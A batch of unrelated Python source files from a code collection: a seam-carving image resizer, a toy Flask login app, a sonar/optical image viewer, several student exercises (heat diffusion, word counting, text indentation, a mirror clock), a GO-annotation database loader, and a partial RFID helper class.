edge.sink.pos[0] == 0:\n neighbors.append(\n image.pixels[((edge.sink.pos[0]+1), (edge.sink.pos[1]+1))])\n\n else:\n neighbors.append(\n image.pixels[((edge.sink.pos[0]-1), (edge.sink.pos[1]+1))])\n neighbors.append(\n image.pixels[((edge.sink.pos[0]+1), (edge.sink.pos[1]+1))])\n\n for n in neighbors:\n cost = (edge.weight+n.energy)\n if n.pos in dic:\n if (dic[n.pos] < cost):\n continue\n else:\n dic[n.pos] = cost\n prev[n.pos] = edge.sink\n heap.add(Edge(edge, n, cost))\n else:\n dic[n.pos] = cost\n prev[n.pos] = edge.sink\n 
heap.add(Edge(edge, n, cost))\n\n\ndef seam_dyn(image):\n    seam = []\n    ans = [0]*(image.width)\n    paths = [[0 for x in range(image.height)] for y in range(image.width)]\n\n    def min_index(j, a):\n        return j+(a.index(min(a)))\n\n    for i in range(0, image.height):\n        tmp = [0]*(image.width)\n\n        ind = min_index(0, [ans[0], ans[1]])\n        paths[0][i] = ind\n        tmp[0] = ans[ind]+image.pixels[(0, i)].energy\n\n        for j in range(1, image.width-1):\n            ind = min_index(j, [ans[j-1], ans[j], ans[j+1]])\n            paths[j][i] = ind-1\n            tmp[j] = ans[ind-1]+image.pixels[(j, i)].energy\n\n        ind = min_index(\n            image.width-1, [ans[image.width-2], ans[image.width-1]])\n        paths[image.width-1][i] = ind-1\n        tmp[image.width-1] = ans[ind-1]+image.pixels[(image.width-1, i)].energy\n\n        ans = tmp\n\n    ind = min_index(0, ans)\n\n    for i in range(image.height-1, -1, -1):\n        seam.append((ind, i))\n        ind = paths[ind][i]\n\n    return seam\n\n\ndef three_three_filter(pixel, neighbors, a, b):\n    [n1, n2, n3, n4, px, n5, n6, n7, n8] = neighbors\n    \"\"\"\n    | n1 n2 n3 |\n    | n4 px n5 |\n    | n6 n7 n8 |\n    \"\"\"\n\n    pos_dx = a * n4.gray + b * n1.gray + b * n6.gray\n    neg_dx = - a * n5.gray - b * n3.gray - b * n8.gray\n    dx = pos_dx + neg_dx\n\n    pos_dy = a * n7.gray + b * n8.gray + b * n6.gray\n    neg_dy = - a * n2.gray - b * n3.gray - b * n1.gray\n    dy = pos_dy + neg_dy\n\n    # adds absolute values of energies to get the overall energy\n    pixel.energy = fabs(dx) + fabs(dy)\n\n    # this pixel does not need to be recalculated\n    pixel.recalculate = False\n\n    return pixel\n\n\ndef Kroon_op(pixel, neighbors):\n    return three_three_filter(pixel, neighbors, 61, 17)\n\n\ndef Scharr_op(pixel, neighbors):\n    return three_three_filter(pixel, neighbors, 10, 3)\n\n\ndef Sobel_op(pixel, neighbors):\n    return three_three_filter(pixel, neighbors, 2, 1)\n\n\ndef five_five_filter(pixel, n, a, b, c, d, e, f):\n    pos_dx = a*n[11].gray + b*n[10].gray + c*(n[6].gray + n[16].gray) + d*(\n        n[5].gray + n[15].gray) + e*(n[1].gray + n[21].gray) + f*(n[0].gray+n[20].gray)\n    # n[19] (not n[8]) mirrors the d*(n[5]+n[15]) term on the positive side\n    neg_dx = a*n[13].gray + b*n[14].gray + c*(n[8].gray + n[18].gray) + d*(\n        n[9].gray + n[19].gray) + e*(n[3].gray + n[23].gray) + f*(n[4].gray + n[24].gray)\n    dx = pos_dx - neg_dx\n    pos_dy = a*n[17].gray + b*n[22].gray + c*(n[16].gray + n[18].gray) + d*(\n        n[21].gray + n[23].gray) + e*(n[15].gray + n[19].gray) + f*(n[20].gray+n[24].gray)\n    neg_dy = a*n[7].gray + b*n[2].gray + c*(n[6].gray + n[8].gray) + d*(\n        n[1].gray + n[3].gray) + e*(n[5].gray + n[9].gray) + f*(n[0].gray + n[4].gray)\n    dy = pos_dy - neg_dy\n\n    pixel.energy = fabs(dx) + fabs(dy)\n\n    pixel.recalculate = False\n\n    return pixel\n\n\ndef Sobel_five_op(pixel, neighbors):\n    return five_five_filter(pixel, neighbors, 20, 10, 10, 8, 4, 5)\n\n\ndef Scharr_five_op(pixel, neighbors):\n    return five_five_filter(pixel, neighbors, 6, 3, 2, 2, 1, 1)\n\n\ndef entropy(pixel, square):\n    num_bins = 25\n    b = 0\n    hist_len = len(square)\n    dim = hist_len**(.5)\n    histogram = {}\n    for i in range(num_bins):\n        histogram[b + (256//num_bins)*i] = 1\n    #histogram = {b:1, 2*b:1, 3*b:1, 4*b:1, 5*b:1, 6*b:1, 7*b:1, 8*b:1, 9*b:1, 10*b:1}\n    for x in range(hist_len):\n        for k, v in histogram.items():\n            if (square[x].gray < k):\n                histogram[k] += 1\n                break\n    square_prob = [float(v)/hist_len for k, v in histogram.items()]  # true division: '//' would floor every probability to 0 and break log()\n    pixel.energy = -sum([p*(log(p, 2)) for p in square_prob])\n    pixel.energy = pixel.energy**5\n    pixel.recalculate = False\n    return pixel\n\n\n# Grayscales the image so that we can run energy calculations on it\ndef to_grayscale(img):\n    return img.convert(\"L\")\n\n\n# creates image sc 
object from python image library representation of a picture\ndef from_pil(im):\n this_id = 0\n pixels = {}\n width, height = im.size\n data = im.getdata()\n for w in range(width):\n for h in range(height):\n\n color = data[h * width + w]\n # color image for the normal picture and have an rgb tuple\n if isinstance(color, tuple):\n pixels[(w, h)] = Pixel((w, h), color)\n this_id += 1\n # grayscale image for the energy picture and an int\n elif isinstance(color, int):\n pixels[(w, h)] = Pixel((w, h), (0, 0, 0), gray=color)\n return pixels, width, height\n\n\nclass sc_Image:\n def __init__(self, dimensions, pixels, PIL):\n self.width = dimensions[0]\n self.height = dimensions[1]\n self.pixels = pixels\n self.dim = 3\n self.PIL = PIL\n\n # Replaced the im.getpixels calls with an im.getdata for performance reasons\n @classmethod\n def from_filepath(cls, filepath):\n im = Image.open(filepath)\n pixels, width, height = from_pil(im)\n return cls((width, height), pixels, im)\n\n\n def to_jpeg(self, filepath):\n data = [(0, 0, 0)] * (self.width * self.height)\n for w in range(self.width):\n for h in range(self.height):\n data[h*self.width + w] = self.pixels[(w, h)].rgb\n im = Image.new(\"RGB\", (self.width, self.height))\n im.putdata(data)\n im.save(filepath, \"JPEG\")\n\n\n def shrink(self, to_remove, orientation=\"vertical\", energy='sobel', alg='dyn'):\n if orientation == 'horizontal':\n self.transpose()\n counter = 0\n for i in range(to_remove):\n counter += 1\n self.set_energies(energy)\n seam = self.remove_seam_vert2(alg)\n if orientation == 'horizontal':\n self.transpose()\n\n\n def enlarge(self, new_pixels, orientation='vertical', energy='e1', alg='dyn', inverse=False):\n if orientation == 'horizontal':\n self.transpose()\n\n original_pixels = copy.deepcopy(self.pixels)\n original_width = self.width\n original_height = self.height\n seams = self.get_n_seams(new_pixels, energy, alg, inverse)\n\n self.width = original_width\n self.height = original_height\n for s in seams:\n self.insert_seam(original_pixels, s)\n self.pixels = original_pixels\n\n if orientation == 'horizontal':\n self.transpose()\n\n\n def enlarge_object_1d(self, new_pixels, orientation=\"vertical\", energy='sobel', alg='dyn'):\n self.shrink(new_pixels, orientation, energy, alg)\n self.enlarge(new_pixels, orientation, energy, alg, True)\n\n\n def enlarge_object(self, seams, energy='sobel', alg='dyn'):\n self.shrink(seams//2, 'vertical', energy, alg)\n self.shrink(seams//2, 'horizontal', energy, alg)\n\n self.enlarge(seams//2, 'vertical', energy, alg)\n self.enlarge(seams//2, 'horizontal', energy, alg)\n\n\n def remove_object(self, rgb, tolerance=5, energy='sobel', alg='dyn'):\n def check_rgb(rgb1, rgb2, tolerance):\n r1, g1, b1 = rgb1\n r2, g2, b2 = rgb2\n return (r2-tolerance < r1 < r2+tolerance and\n g2-tolerance < g1 < g2+tolerance and b2-tolerance < b1 < b2+tolerance)\n\n max_width = 0\n for h in range(self.height):\n width = 0\n for w in range(self.width):\n if check_rgb(self.pixels[(w, h)].rgb, rgb, tolerance):\n self.pixels[(w, h)].energy = -99999999999\n self.pixels[(w, h)].to_remove = True\n self.pixels[(w, h)].recalculate = False\n width += 1\n if width > max_width:\n max_width = width\n\n self.shrink(max_width, energy=energy, alg=alg)\n\n for h in range(self.height):\n for w in range(self.width):\n self.pixels[(w, h)].original_pos = self.pixels[(w, h)].pos\n\n self.enlarge(max_width, energy=energy, alg=alg)\n\n\n def to_energy_pic(self, filepath, energy='sobel'):\n original_pixels = self.pixels\n gray_pixels, w, h = 
from_pil(to_grayscale(self.PIL))\n self.pixels = gray_pixels\n self.set_energies(energy)\n\n data = [0] * (self.width * self.height)\n for w in range(self.width):\n for h in range(self.height):\n data[h*self.width + w] = self.pixels[(w, h)].energy\n im = Image.new(\"L\", (self.width, self.height))\n im.putdata(data)\n im.save(filepath, \"JPEG\")\n\n self.pixels = original_pixels\n\n\n def to_seam_pic(self, filepath, n, energy='sobel', alg='dyn', orientation='vertical'):\n\n if orientation == 'horizontal':\n self.transpose()\n\n original_pixels = copy.deepcopy(self.pixels)\n original_width = self.width\n original_height = self.height\n\n seams = self.get_n_seams(n, energy, alg)\n\n to_color = []\n for seam in seams:\n to_color.append(\n [p.original_pos for p in [_f for _f in seam if _f]])\n\n for seam in to_color:\n for pos in seam:\n original_pixels[pos].rgb = (300, 0, 0)\n\n self.pixels = original_pixels\n self.width = original_width\n self.height = original_height\n\n if orientation == 'horizontal':\n self.transpose()\n\n self.to_jpeg(filepath)\n\n\n def get_neighbors_simple(self, pos, pixels):\n x, y = pos\n data = []\n for j in range(y+(self.dim//2), y-(self.dim//2+1), -1):\n for i in range(x-(self.dim//2), x+(self.dim//2+1)):\n try:\n data.append(pixels[(i, j)])\n except KeyError:\n data.append(None)\n return data\n\n\n def recalculate_neighbors(self, pos):\n for p in self.get_neighbors_simple(pos, self.pixels):\n if p is not None:\n p.to_recalculate()\n\n\n # gets the dim x dim square of pixels of the pixel at pos for energy functions\n def get_neighbors(self, pos, pixels):\n data = self.get_neighbors_simple(pos, pixels)\n\n if (self.dim == 3):\n edge_replace = {0: [2, 6, 8], 1: [7], 2: [0, 8, 6],\n 3: [5], 5: [3], 6: [0, 8, 2], 7: [1], 8: [2, 6, 0]}\n\n for i in range(len(data)):\n if data[i] is None:\n for replace_with in edge_replace[i]:\n if data[replace_with] is not None:\n data[i] = data[replace_with]\n break\n return data\n\n def get_pixel(self, pos):\n if pos in self.pixels:\n return self.pixels[pos]\n else:\n return None\n\n\n def make_mirror_dic(self):\n marg = self.dim//2\n temp_pix = self.pixels\n\n for h in list(range(-marg, 0)) + list(range(self.height, self.height + marg)):\n for w in range(self.width):\n if h < 0:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(w, 0)].gray)\n else:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(w, self.height - 1)].gray)\n\n for w in list(range(-marg, 0)) + list(range(self.width, self.width + marg)):\n for h in range(- marg, self.height + marg):\n if w < 0:\n if h < 0:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(0, 0)].gray)\n elif h >= self.height:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(0, self.height-1)].gray)\n else:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(0, h)].gray)\n else:\n if h < 0:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(self.width-1, 0)].gray)\n elif h >= self.height:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(self.width-1, self.height-1)].gray)\n else:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(self.width-1, h)].gray)\n return temp_pix\n\n\n def set_energies(self, algorithm='sobel'):\n def set_energy_e1_Sobel(pixel):\n if pixel.recalculate:\n return Sobel_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n\n def set_energy_e1_Scharr(pixel):\n if pixel.recalculate:\n return Scharr_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n\n def 
set_energy_e1_Kroon(pixel):\n            if pixel.recalculate:\n                return Kroon_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n            else:\n                return pixel\n\n\n        def set_energy_e1_Sobel_5(pixel, pixels):\n            if pixel.recalculate:\n                return Sobel_five_op(pixel, self.get_neighbors(pixel.pos, pixels))\n            else:\n                return pixel\n\n\n        def set_energy_e1_Scharr_5(pixel, pixels):\n            if pixel.recalculate:\n                return Scharr_five_op(pixel, self.get_neighbors(pixel.pos, pixels))\n            else:\n                return pixel\n\n\n        def set_energy_entropy(pixel, pixels):\n            if pixel.recalculate:\n                # use the mirrored pixel dict that is passed in, not self.pixels\n                return entropy(pixel, self.get_neighbors(pixel.pos, pixels))\n            else:\n                return pixel\n\n        self.dim = 3\n        if algorithm == 'sobel':\n            list(map(set_energy_e1_Sobel, list(self.pixels.values())))\n\n        elif algorithm == 'scharr':\n            list(map(set_energy_e1_Scharr, list(self.pixels.values())))\n\n        elif algorithm == 'kroon':\n            list(map(set_energy_e1_Kroon, list(self.pixels.values())))\n\n        elif (algorithm == 'sobel5' or algorithm == 'scharr5'):\n            self.dim = 5\n            temp_pix = self.make_mirror_dic()\n\n            for h in range(self.height):\n                for w in range(self.width):\n                    if algorithm == 'sobel5':\n                        set_energy_e1_Sobel_5(self.pixels[(w, h)], temp_pix)\n                    if algorithm == 'scharr5':\n                        set_energy_e1_Scharr_5(self.pixels[(w, h)], temp_pix)\n\n        elif algorithm == 'entropy':\n            self.dim = 9\n            temp_pix = self.make_mirror_dic()\n            for h in range(self.height):\n                for w in range(self.width):\n                    set_energy_entropy(self.pixels[(w, h)], temp_pix)\n\n        else:\n            raise Exception(\n                \"%s is not one of the implemented algorithms\" % algorithm)\n\n\n    def get_next_seam(self, alg):\n        if alg == 'dijk':\n            return seam_dijk(self)\n        else:\n            return seam_dyn(self)\n\n\n    def top_vert_row(self):\n        return list(map(self.get_pixel, [(0, h) for h in range(self.height)]))\n\n\n    def top_horz_row(self):\n        return list(map(self.get_pixel, [(w, 0) for w in range(self.width)]))\n\n\n    def remove_seam_vert2(self, alg, return_pixels=False):\n        seam = self.get_next_seam(alg)\n        to_remove = seam\n        if return_pixels:\n            pixels = [copy.deepcopy(self.get_pixel(p)) for p in seam]\n        else:\n            pixels = []\n\n        for h in range(self.height):\n            decrement = False\n            for w in range(self.width):\n                if not decrement:\n                    if (w, h) in to_remove:\n                        decrement = True\n                        self.recalculate_neighbors((w, h))\n\n                else:\n                    # only pixels to the right of the removed seam pixel shift left\n                    self.pixels[(w, h)].shift_pos(-1, 0)\n                    self.pixels[(w-1, h)] = self.pixels[(w, h)]\n\n            del self.pixels[self.width-1, h]\n\n        # the whole image is one column narrower once every row has lost a pixel\n        self.width -= 1\n\n        return pixels\n\n\n    def insert_seam(self, pixels, seam):\n        for pixel in seam:\n            h = pixel.pos[1]\n\n            for w in range(self.width-1, -1, -1):\n                if pixel.original_pos == (w, h):\n                    pixel.pos = (w+1, h)\n                    pixels[(w+1, h)] = pixel\n                    # update rgb value\n                    left = pixels[(w, h)].rgb\n\n                    if (w+2, h) in pixels:\n                        right = pixels[(w+2, h)].rgb\n                    else:\n                        right = pixel.rgb\n\n                    pixel.rgb = self.average_rgb(left, right)\n                    break\n\n                else:\n                    pixels[(w, h)].shift_pos(1, 0)\n                    pixels[(w+1, h)] = pixels[(w, h)]\n\n        self.width += 1\n        return pixels\n\n\n    def average_rgb(self, rgb1, rgb2):\n        r1, g1, b1 = rgb1\n        r2, g2, b2 = rgb2\n\n        return ((r1+r2)//2, (g1+g2)//2, (b1+b2)//2)\n\n\n    def get_n_seams(self, n, energy, alg, inverse=False):\n        seams = []\n        for i in range(n):\n            self.set_energies(energy)\n            if inverse:\n                self.invert_energies()\n            seam = self.remove_seam_vert2(alg, return_pixels=True)\n            seams.append(seam)\n\n        return seams\n\n\n    def invert_energies(self):\n        for w in range(self.width):\n            for h in range(self.height):\n                self.pixels[(w, h)].energy *= -1\n\n\n    def transpose(self):\n        new_pix = {}\n        for i in 
range(self.width):\n            for j in range(self.height):\n                new_pix[(j, i)] = Pixel((j, i), self.pixels[(i, j)].rgb)\n        self.pixels = new_pix\n        tmp = self.height\n        self.height = self.width\n        self.width = tmp\n\n\nclass Pixel:\n    def __init__(self, pos, rgb, gray=None):\n        self.pos = pos\n        self.original_pos = pos\n        self.rgb = rgb\n\n        if gray is None:\n            r, g, b = self.rgb\n            self.gray = r + 256 * g + (256 ** 2) * b  # ** not ^: the caret is XOR in Python\n        else:\n            self.gray = gray\n\n        self.energy = 0\n\n        self.to_remove = False\n\n        self.recalculate = True\n\n\n    def shift_pos(self, dx, dy):\n        self.pos = (self.pos[0]+dx, self.pos[1]+dy)\n\n\n    def to_recalculate(self):\n        if not self.to_remove:\n            self.recalculate = True\n\n\n    def __str__(self):\n        return \"[%s , %s]\" % (str(self.pos), str(self.energy))\n\n\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_energy_pic('images/giza_energy_map_entropy.jpg', 'entropy')\n# im.to_energy_pic('images/giza_energy_map_sobel.jpg', 'sobel')\n# im.to_energy_pic('images/giza_energy_map_kroon.jpg', 'kroon')\n# im.to_energy_pic('images/giza_energy_map_sobel5.jpg', 'sobel5')\n# im.to_energy_pic('images/giza_energy_map_scharr5.jpg', 'scharr5')\n\n#shrinking giza by 120 pixels\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.shrink(120,orientation = 'vertical', energy = 'kroon', alg = 'dyn')\n# im.to_jpeg(\"images/giza_shrank.jpg\")\n\n# #displays seams created by sobel\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_sobel.jpg\",80, energy = 'sobel')\n\n#displays seams created by scharr\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_scharr.jpg\",80, energy = 'scharr')\n\n# #displays seams created by kroon\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_kroon.jpg\",80, energy = 'kroon')\n\n#displays seams created by scharr5\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_scharr5.jpg\",80, energy = 'scharr5')\n\n#horizontal seam picture for night\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_night_seams.jpg\", 120,orientation = 'horizontal', energy = 'scharr', alg = 'dyn')\n\n#displays seams found by dijkstra's algorithm\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_dijk_seams.jpg\",10, energy = 'sobel', alg = 'dijk')\n\n#displays seams found by dynamic programming\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_dyn_seams.jpg\",10, energy = 'sobel', alg = 'dyn')","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":22409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"464084855","text":"from flask import Flask, render_template, request, redirect, url_for, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom functools import wraps\nimport sys\n\n#import sqlite3\n\napp = Flask(__name__)\n\n#config\nimport os\nimport config\n\napp.config.from_object(os.environ['APP_SETTINGS'])\n\n#create the sqlalchemy object\ndb = SQLAlchemy(app)\n\n#import models after creating SQLAlchemy object\nfrom models import *\n\ndef login_required(f):\n    @wraps(f)\n    def wrap(*args, **kwargs):\n        if 'logged_in' in session:\n            return f(*args, **kwargs)\n        else:\n            flash('You need to login first.')\n            return redirect(url_for('login'))\n    return wrap\n\n@app.route('/')\n@login_required\ndef home():\n    #return \"hello people\"\n    posts = db.session.query(BlogPost).all()\n    return 
render_template(\"index.html\", posts=posts)\n\n@app.route('/welcome')\ndef welcome():\n return render_template('welcome.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n error = 'Invalid credentials. please re-enter your details in the spaces provided'\n else:\n session['logged_in'] = True\n flash('You are now in the Grid!')\n return redirect(url_for('home'))\n return render_template('login.html', error=error)\n\n@app.route('/logout')\n@login_required\ndef logout():\n session.pop('logged_in', None)\n flash('May Tron grant you mercy as you leave!')\n return redirect(url_for('welcome'))\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376736095","text":"import cv2\nimport argparse\nimport glob\nfrom ampProc.amp_common import ampCommon\nimport numpy as np\n\ndef main(images):\n file = open(images, 'r')\n for fnames in file:\n optical = cv2.imread(fnames.split(',')[0])\n sonar = cv2.imread(fnames.split(',')[1].rstrip())\n cv2.imshow('optical', optical)\n cv2.imshow('sonar', sonar)\n cv2.waitKey(1)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Creation of co-registered \\\n videos from AMP optical/acoustic data\")\n parser.add_argument(\"--images_file\", help=\"Path to images text file\",\n default=\"data/co-registered_detections.txt\")\n\n args = parser.parse_args()\n\n\n main(args.images_file)\n","sub_path":"scripts/co-registered_video_creation2.py","file_name":"co-registered_video_creation2.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550351828","text":"# HW 04: Problem 02\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nt = 0\r\ndt = 6\r\nlamb = 0.735\r\nmark = ['o', 'v', '*', '+', 's']\r\n# Initial Condition\r\nx = [100, 0, 0, 0, 0, 50]\r\n# Boundary Condition\r\nxn = [100, 0, 0, 0, 0, 50]\r\n# Applying Condition\r\nfor m in range(5):\r\n for i in range(1, 5):\r\n xn[i] = (x[i] + (lamb * (x[i-1] - 2 * x[i] + x[i+1])))\r\n xp = xn\r\n print(xp)\r\n x_a = np.linspace(0, 10, 6)\r\n plt.plot(x_a, xp, marker=mark[m])\r\n x = xp\r\n xn = [100, 0, 0, 0, 0, 50]\r\n# Plotting\r\nplt.xlabel('Distance(m)') # X-Axis\r\nplt.ylabel('Temp degC') # Y-axis\r\nplt.title('Change of Temperature throughout the length')\r\nplt.legend(['6 sec','12 sec','18 sec','24 sec', '30 sec'])\r\nplt.grid('True')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109558625","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom database_models import Model_go_slim, Model_iprscan\nbase = declarative_base()\nengine = create_engine ( 'sqlite:////Users/burkej24/Desktop/potato_website/DM_6.1.db')\nbase.metadata.create_all ( engine )\nSession = sessionmaker ( engine )\nsession = Session ( )\n\ngo_dict = {}\nwith open(\"go_slim.txt\", \"r\") as go_in:\n go_in.readline()\n go_in.readline ( )\n go_in.readline ( )\n go_in.readline ( )\n for line in go_in:\n temp_dict = {}\n line 
= line.rstrip().split(\"\\t\")\n temp_dict[\"go_accession\"] = line[5]\n temp_dict[\"go_type\"] = line[7]\n temp_dict[\"go_name\"] = line[8]\n temp_dict[\"go_ev_code\"] = line[9]\n temp_dict[\"go_dbxref\"] = \"TAIR:\" + line[0]\n go_dict[line[5]] = temp_dict\nprint(\"dictionary created\")\n\nquery = session.query(Model_iprscan).filter(Model_iprscan.interpro_go != \"NA\")\nprint(len(query.all()))\nseen_dict = {}\ncount = 0\nfor item in query:\n seen_dict[str(item.transcript_id)] = []\nfor item in query:\n try:\n transcript_id = str(item.transcript_id)\n go_list = item.interpro_go.split(\"|\")\n for go in go_list:\n temp = go_dict[go]\n if temp[\"go_accession\"] in seen_dict[transcript_id]:\n continue\n else:\n model = Model_go_slim(transcript_id=transcript_id, go_accession=temp[\"go_accession\"], go_type=temp[\"go_type\"],\n go_name=temp[\"go_name\"], go_ev_code=temp[\"go_ev_code\"], go_dbxref=temp[\"go_dbxref\"], count = count)\n seen_dict[transcript_id].append(temp[\"go_accession\"])\n session.add ( model )\n count+=1\n\n except KeyError:\n print(\"error\")\nprint(count)\nsession.commit()","sub_path":"go_slim.py","file_name":"go_slim.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242012676","text":"fh = open(\"mbox-short.txt\")\n\nnew_dict = dict()\n\nfor line in fh:\n words = line.split()\n for word in words:\n new_dict[word] = new_dict.get(word,0)+1\n\n'''bigWord = None\nfor word, count in new_dict.items():\n if bigCount is None or count>bigCount:\n bigCount = count\n bigWord = word\n\nprint(bigCount)\nprint(bigWord)'''\n\nbigCount = None\nbigWord = None\nfor word, count in new_dict.items():\n if bigCount is None:\n bigCount = count\n elif count > bigCount:\n bigCount = count\n bigWord = word\nprint(bigCount,bigWord)\n\nsmallCount = None\nsmallWord = None\nfor word, count in new_dict.items():\n if smallCount is None:\n smallCount = count\n elif count < smallCount:\n smallCount = count\n smallWord = word\nprint(smallCount,smallWord)\n","sub_path":"basicones/finding_largest_word.py","file_name":"finding_largest_word.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560173066","text":"#!/usr/bin/python3\n\"\"\"Function that splits a text according to ., ?, and :\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"function that splits a string of text\n\n Arguments:\n text (str): the string of text to split\n \"\"\"\n\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n i = 0\n text = text.strip()\n\n while i < len(text):\n print(text[i], end='')\n if text[i] == '.' or text[i] == '?' or text[i] == ':':\n print('\\n')\n if i == len(text) - 1:\n break\n if text[i + 1] == ' ':\n i = i + 1\n while text[i] == ' ' and text[i + 1] == ' ':\n i = i + 1\n i = i + 1\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382725216","text":"def clock(time: str) -> str:\n\n if time.count(':') != 1 or time == ':' or time.startswith(':') or time.endswith(':'):\n print('[ERROR] Invalid syntax of Time.')\n exit()\n else:\n x = time.replace(':', '', 1)\n if not x.isdecimal():\n print('[ERROR] Invalid syntax.\\nEnter only numbers, please! (e. g. 
05:45)')\n exit()\n else:\n hour, minute = time.split(':')\n hour = int(hour)\n minute = int(minute)\n\n if not hour in range(1, 13) and minute > 59:\n print('Wrong form of hour and minute')\n exit()\n if not hour in range(1, 13):\n print('Wrong form of hour.\\nHours can be in range 01 to 12.')\n exit()\n elif minute > 59:\n print('Wrong form of minute.\\nMinutes can be in range 00 to 59.')\n exit()\n\n if hour == 12 and minute == 0: # Defining specific hour: (12:00)\n print('12:00')\n exit()\n\n if hour > 10 and minute != 0: # Defining the Mirror Time\n mirror_hour = 23 - hour\n\n elif hour < 11 and minute != 0:\n mirror_hour = 11 - hour\n\n\n if minute != 0: # Defining the Mirror Minute\n mirror_minute = 60 - minute\n else:\n mirror_hour = 12 - hour\n mirror_minute = minute\n\n if mirror_hour < 10: # Formation of Output\n mirror_hour = '{}{}'.format(0, mirror_hour)\n\n if mirror_minute < 10:\n mirror_minute = '{}{}'.format(0, mirror_minute)\n\n a = '{}{}{}'.format(mirror_hour, ':', mirror_minute)\n\n return a\n\n\n\n","sub_path":"Hayk_homework_4 (Mirror Clock).py","file_name":"Hayk_homework_4 (Mirror Clock).py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595332082","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\n# SPDX-License-Identifier: MIT\n\n# import board\n# import busio\n# from digitalio import DigitalInOut\n# from adafruit_pn532.spi import PN532_SPI\nimport pandas as pd\n\n\nclass RFIDNoHardware:\n\n def __init__(self):\n # SPI connection:\n # self.spi = busio.SPI(board.SCK, board.MOSI, board.MISO)\n # self.cs_pin = DigitalInOut(board.D5)\n # self.pn532 = PN532_SPI(self.spi, self.cs_pin, debug=False)\n # self.ic, self.ver, self.rev, self.support = self.pn532.firmware_version\n\n # Configure PN532 to communicate with MiFare cards\n # self.pn532.SAM_configuration()\n\n # NOTE: enter the exact path for your machine to run locally\n # self.file_path = \"/home/pi/Documents/CS179J-Smart-Water-Station/data/user_data.csv\"\n self.file_path = \"/home/chris/PycharmProjects/CS179J-Smart-Water-Station/data/user_data.csv\"\n self.uid = ''\n\n # def output_uid(self):\n # print(\"Waiting for RFID/NFC card...\")\n # while True:\n # # Check if a card is available to read\n # self.uid = self.pn532.read_passive_target(timeout=0.5)\n # print(\".\", end=\"\")\n # # Try again if no card is available.\n # if self.uid is None:\n # continue\n # print(\"Found card with UID:\", [hex(i) for i in self.uid])\n\n def set_uid(self, uid):\n self.uid = uid\n\n def get_uid(self):\n return self.uid\n\n # def scan_card(self):\n # self.uid = None\n #\n # while self.uid is None:\n # self.uid = self.pn532.read_passive_target(timeout=0.5)\n #\n # uid = [hex(i) for i in self.uid]\n # self.uid = ''\n #\n # for string in uid:\n # self.uid += string[2:]\n\n def register_card(self, the_uid):\n df = pd.read_csv(self.file_path)\n\n index = df.index[df['card_uid'] == the_uid].tolist()\n\n card_state = df.at[index[0], 'registration_state']\n\n if not card_state:\n df.at[index[0], 'registration_state'] = True\n df.to_csv(self.file_path, index=False)\n\n def unregister_card(self, the_uid):\n self.uid = ''\n\n df = pd.read_csv(self.file_path)\n\n index = df.index[df['card_uid'] == the_uid].tolist()\n\n card_state = df.at[index[0], 'registration_state']\n\n if card_state:\n 